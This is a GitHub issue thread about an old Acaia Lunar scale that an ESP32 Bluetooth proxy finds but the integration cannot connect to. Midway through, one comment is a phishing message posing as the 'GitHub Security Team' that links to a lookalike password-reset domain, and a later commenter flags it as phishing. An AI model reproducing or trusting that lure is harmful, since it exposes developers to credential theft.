### ISSUE TITLE
Acaia Lunar (V1) not found

### ISSUE THREAD

**Issue by sebo81** [zweckj/acaia#6]
Hi,

I tried to use the integration with my old Lunar which is found by the ESP32 Bluetooth Proxy (checked with MAC address), but doesn´t work with the integration. Could be that I did something wrong (very likely) but as it is not a model after 2021 I thought I let you know :)

**Comment by zweckj** [comment]
It _should_ work since #2. Have you tried toggling the setting during setup?

**Comment by sebo81** [comment]
Hi Josef, yes I did but I get the feeling my bluetooth proxy is not doing well. It finds the Acaia but I guess it doesn't connect. Right now I don´t have another device to test the bluetooth connection but will do that first. Otherwise I have MAC, local Name from the Lunar, so should work right?

**Comment by zweckj** [comment]
No idea tbh. Only thing I know is that apparently it's working for the other guys with an older Pearl.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Comment by Daneish** [comment]
I’m sure you’re already aware, but for the avoidance of doubt: the above comment from GtdsIndonesia is a phishing spam message. For anyone that is on mobile and can’t see the link preview, it links to a third party domain (not GitHub). Other than reporting the user, does Github provide any other tools to hide/delete the comment?
